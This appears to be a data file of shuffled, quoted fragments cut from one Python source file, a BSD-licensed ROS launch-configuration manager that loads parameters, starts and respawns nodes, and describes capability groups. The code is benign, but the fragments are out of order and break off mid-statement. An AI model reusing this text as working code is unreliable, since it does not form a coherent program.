"n.launch_prefix is not None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' %",
"msg, _ in r: if code != 1: raise StartException(\"Failed to set parameter:",
"list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter server if self.load_params_at_start: self.loadParams()",
"= True break if not start_now: # Start the timer for waiting for",
"args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and autostart and start_delay >",
"0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime')",
"item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n =",
"permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS",
"entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] ==",
"= rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now =",
"not None: self.listService.shutdown('reload config') self.listService = None self.nodes = [] # the name",
"dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))} ''' result = dict()",
"else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname #",
"# add node environment parameter for k, v in n.env_args: new_env[k] = v",
"rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is None:",
"rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" %",
"or promote products derived # from this software without specific prior written permission.",
"elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self,",
"EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE",
"the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d:",
"r = param_server_multi() # for code, msg, _ in r: # if code",
"node, autostart=False): ''' Start the node with given name from the currently loaded",
"rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart",
"''' result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return",
"to the group if not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group'",
"try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces",
"plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter",
"file in the given package. If more then one launch file with the",
"= False for f in afilter: if a.startswith(f): in_filter = True break if",
"found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is",
"self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc() if self.do_autostart: if not",
"str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay",
"configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' :",
"the ROS HOME path depending on ROS distribution API. @return: ROS HOME path",
"spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code,",
"print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self,",
"'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try: for k in ['BASH_ENV',",
"URI depending on ROS distribution API. @return: ROS master URI @rtype: C{str} '''",
"self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded =",
"for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node environment",
"to print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def",
"rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import",
"'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master URI depending",
"and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else:",
"get_ros_home(self): ''' Returns the ROS HOME path depending on ROS distribution API. @return:",
"code must retain the above copyright # notice, this list of conditions and",
"is given, try first to find the launch file in the given package.",
"= types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd] if",
"cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added:",
"if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format,",
"roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import",
"self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list):",
"False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability group",
"parameter for k, v in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment",
"OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY,",
"the 'capability_group' parameter found, assign node to the group if cap_param in self.roscfg.params",
"current description. ''' return self.description_response def loadParams(self): ''' Loads all parameter into ROS",
"CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL",
"pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list with names",
"in master.getPublishedTopics(''): if start_required == topic: start_now = True break if not start_now:",
"executables are found! The first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self,",
"master.getPublishedTopics(''): if start_required == topic: start_now = True break if not start_now: #",
"launch_file raise LoadException('File %s in package [%s] not found!' % (path, package)) def",
"node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def",
"list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the",
"node to the group if not cap_ns: cap_ns = roslib.names.SEP # if the",
"to endorse or promote products derived # from this software without specific prior",
"get the capabilities description # use two separate loops, to create the description",
"Start the node with given name from the currently loaded configuration. @param node:",
"delay_service_creation=0.): ''' Load the launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown",
"name, sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description as",
"cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result:",
"then one launch file with the same name found in the package, the",
"other materials provided # with the distribution. # * Neither the name of",
"started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now",
"string if sys.version_info[0] <= 2: import types string_types = types.StringTypes else: string_types =",
"rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy import shlex import std_srvs.srv",
"names for item in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine",
"# get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items():",
"except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): '''",
"threading from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception",
"self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except:",
"== node: n = item break if n is None: raise StartException(\"Node '%s'",
"in_filter = True break if ':=' not in a or in_filter: continue result.append(a)",
"= None self.nodes = [] # the name of nodes with namespace self.sensors",
"# * Redistributions of source code must retain the above copyright # notice,",
"pass # print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts)",
"['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node environment parameter for k,",
"xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None",
"param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc param_server_multi =",
"import roslib.network import rospy import shlex import std_srvs.srv import subprocess import sys import",
"capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description':",
"group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes'])",
"list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with node names for",
"!= 1: raise StartException(\"Failed to set parameter: %s\" % (msg)) except Exception: raise",
"self.description_response def loadParams(self): ''' Loads all parameter into ROS parameter server. ''' params",
"= int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns the ROS HOME",
"# env = n.env_args prefix = n.launch_prefix if n.launch_prefix is not None else",
"return result def _masteruri_from_ros(self): ''' Returns the master URI depending on ROS distribution",
"and 'ENV' from environment new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']:",
"> 1: raise StartException('Multiple executables are found! The first one was started! Exceutables:\\n%s'",
"code, msg, _ in r: if code != 1: raise StartException(\"Failed to set",
"start_now and autostart and start_delay > 0: start_now = False # start timer",
"None: raise StartException(\"Node '%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)):",
"= path # if package is set, try to find the launch file",
"the documentation and/or other materials provided # with the distribution. # * Neither",
"StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle different result types str",
"If package is given, try first to find the launch file in the",
"from environment new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k]",
"len(cmd) > 1: raise StartException('Multiple executables are found! The first one was started!",
"rosservice_list_nodes(self, req): ''' Callback for the ROS service to get the list with",
"if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response",
"the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name",
"Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from",
"<NAME> # All rights reserved. # # Redistribution and use in source and",
"= int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] =",
"[''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables",
"self._get_start_required(node) if autostart and start_required: start_now = False # get published topics from",
"# shutdown the services to inform the caller about a new configuration. if",
"= False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" %",
"except Exception as e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart =",
"reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as it",
"(c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. # # Redistribution and",
"Redistribution and use in source and binary forms, with or without # modification,",
"if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list,",
"cwd=cwd, env=env) # wait for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait)",
"self.roscfg is not None: # get the capabilities description # use two separate",
"created on each load of a launch file to inform the caller about",
"cmd = self._get_node(n.package, n.type) # determine the current working path, Default: the package",
"if sys.version_info[0] <= 2: import types string_types = types.StringTypes else: string_types = (str,)",
"if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes,",
"not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False)",
"e) self.do_autostart = False def _decode(self, val): ''' Replaces the '\\\\n' by LF",
"os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy import shlex",
"assign node to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p =",
"self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK to let the node_manager",
"the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS services #",
"return topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay': 0}",
"new configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService = None if",
"Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback",
"descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter server",
"notice, this list of conditions and the following disclaimer. # * Redistributions in",
"LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,",
"loaded configuration. @param node: the name of the node @type node: C{str} @raise",
"= [] for a in argv: in_filter = False for f in afilter:",
"# initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty,",
"n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return",
"self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig()",
"for code, msg, _ in r: if code != 1: raise StartException(\"Failed to",
"rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will",
"== 0: raise StartException('%s in package [%s] not found!' % (filename, pkg)) return",
"self.listService = None '''@ivar: The service will be created on each load of",
"n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if",
"The service will be created on each load of a launch file to",
"PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS;",
"not start_now: # Start the timer for waiting for the topic start_timer =",
"parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p",
"if not self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes: itemname =",
"for C{capabilities} and C{capability_group} parameter and creates dictionary for grouping the nodes. @return:",
"given, try first to find the launch file in the given package. If",
"start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid 'defunct'",
"dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr = '' for",
"self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False)",
"result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if ns == cap_ns and",
"result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] =",
"item.machine_name if item.machine_name is not None and not item.machine_name == 'localhost' else ''",
"if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 5:",
"description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines:",
"for a launch file. If package is given, try first to find the",
"''' Returns the current description. ''' return self.description_response def loadParams(self): ''' Loads all",
"= rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\"",
"None '''@ivar: The service will be created on each load of a launch",
"autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter =",
"'%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd =",
"= [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS",
"= roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if",
"in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed",
"file. If package is given, try first to find the launch file in",
"''' Start the node with given name from the currently loaded configuration. @param",
"the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar:",
"or array of string if sys.version_info[0] <= 2: import types string_types = types.StringTypes",
"return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except:",
"source code must retain the above copyright # notice, this list of conditions",
"= ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv",
"FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE",
"os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s] not found!' % (path,",
"rosservice_load_launch(self, req): # ''' # Load the launch file # ''' # try:",
"1: raise StartException(\"Failed to set parameter: %s\" % (msg)) except Exception: raise #",
"'') '''@ivar: robot description as tupel of (type, name, text) ''' self.package =",
"return [] def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req): #",
"traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in",
"v # the ROS_NAMESPACE environment is used in cpp plugins in rqt if",
"self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req):",
"respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn",
"5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\",",
"start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required:",
"namespace of the node if ns not in result[machine_name]: result[machine_name][ns] = dict() if",
"str @return: the decoded string @rtype: C{unicode} or original on error ''' result",
"roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns",
"start_now = True break if not start_now: # Start the timer for waiting",
"WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN",
"rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service =",
"the node if ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value not",
"INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT",
"'name', 'images', 'description'] -> ignore\", param) else: for entry in p.value: try: print(entry[0],",
"4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else: for",
"not found ''' launch_file = path # if package is set, try to",
"robot description as tupel of (type, name, text) ''' self.package = '' self.file",
"= dict() capabilies_descr = dict() if self.roscfg is not None: # get the",
"the package, the first one will be tacked. @param path: the file name",
"node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude",
"''' result = dict() capabilies_descr = dict() if self.roscfg is not None: #",
"# handle different result types str or array of string if sys.version_info[0] <=",
"import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv",
"if itemname == node: n = item break if n is None: raise",
"topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now = True break if",
"parameters onto the parameter server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client",
"prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS",
"local namespace sys.argv = list(argv) # set the global environment to empty namespace",
"wait for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() #",
"or len(cmd) == 0: raise StartException('%s in package [%s] not found!' % (filename,",
"if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 4:",
"to clear parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server)",
"entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for item in self.roscfg.nodes: node_fullname",
"ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching for the given launch",
"(n.cwd is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd ==",
"None: # get the capabilities description # use two separate loops, to create",
"result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master URI depending on ROS",
"t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True)",
"file @rtype: C{str} @raise LoadException: if the given file is not found '''",
"run a node containing in the loaded configuration. ''' pass class DefaultCfg(object): def",
"req.file, req.argv) # finally: # self.__lock.release() # return [] def rosservice_description(self, req): '''",
"parameter: %s\" % (msg)) except Exception: raise # re-raise as this is fatal",
"AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE",
"= threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) #",
"self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s: %s\",",
"cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package",
"in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not",
"or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images =",
"def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return",
"ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription,",
"THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import",
"'.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV'",
"use in source and binary forms, with or without # modification, are permitted",
"in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name]",
"in package [%s] not found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback",
"the list with node names for item in self.roscfg.nodes: if item.machine_name and not",
"''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS service to",
"list of conditions and the following # disclaimer in the documentation and/or other",
"_load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the parameter server \"\"\" try:",
"name, text) ''' self.package = '' self.file = '' self.__lock = threading.RLock() #",
"namespace sys.argv = list(argv) # set the global environment to empty namespace os.environ[ROS_NAMESPACE]",
"too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi()",
"the launch file @type path: C{str} @param package: the package containing the launch",
"BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES",
"try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import",
"if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description':",
"# Software License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US,",
"# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #",
"self.description_response = ListDescriptionResponse() # variables to print the pending autostart nodes self._pending_starts =",
"prefix = n.launch_prefix if n.launch_prefix is not None else '' args = ['__ns:=%s'",
"remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri # if",
"None: self.runService.shutdown('reload config') self.runService = None if self.listService is not None: self.listService.shutdown('reload config')",
"import shlex import std_srvs.srv import subprocess import sys import threading from .screen_handler import",
"= cap_ns # add new group in the namespace of the node if",
"in package [%s] not found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node):",
"Load the launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services",
"found in the package, the first one will be tacked. @param path: the",
"'', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master URI",
"autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list, skip",
"except: pass return topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0,",
"param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params,",
"'\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start",
"return [] def rosservice_description(self, req): ''' Returns the current description. ''' return self.description_response",
"node cwd = self.get_ros_home() if not (n.cwd is None): if n.cwd == 'ROS_HOME':",
"the following conditions # are met: # # * Redistributions of source code",
"LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR",
"be created on each load of a launch file to inform the caller",
"descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros()",
"= machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current working",
"cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign node to",
"0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic",
"p.value) r = param_server_multi() for code, msg, _ in r: if code !=",
"[]) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" %",
"and the following disclaimer. # * Redistributions in binary form must reproduce the",
"def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and C{capability_group} parameter and",
"try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name",
"thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except: pass # print",
"parameter group parameter found, assign node to the group if not cap_ns: cap_ns",
"0: # if more then one launch file is found, take the first",
": dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))} ''' result",
"the first one will be tacked. @param path: the file name of the",
"for the ROS service to get the list with available nodes. ''' return",
"result[machine_name].items(): if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True",
"decoded string @rtype: C{unicode} or original on error ''' result = val.replace(\"\\\\n \",",
"= True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now",
"# if package is set, try to find the launch file in the",
"file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services to inform the",
"raise StartException('%s in package [%s] not found!' % (filename, pkg)) return cmd def",
"of a launch file to inform the caller about a new configuration. '''",
"from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi",
"package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more then",
"parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg, _ in",
"BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN",
"new configuration. ''' self.listService = None '''@ivar: The service will be created on",
"distribution API. @return: ROS master URI @rtype: C{str} ''' try: import rospkg.distro distro",
"file is not found ''' launch_file = path # if package is set,",
"path @type package: C{str} @return: the absolute path of the launch file @rtype:",
"if machine_name not in result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items():",
"set the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path,",
"and start_required: start_now = False # get published topics from ROS master master",
"else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService",
"load(self, delay_service_creation=0.): ''' Load the launch file configuration ''' with self.__lock: self._pending_starts.clear() #",
"multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import",
"!= 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else:",
"shlex import std_srvs.srv import subprocess import sys import threading from .screen_handler import ScreenHandler",
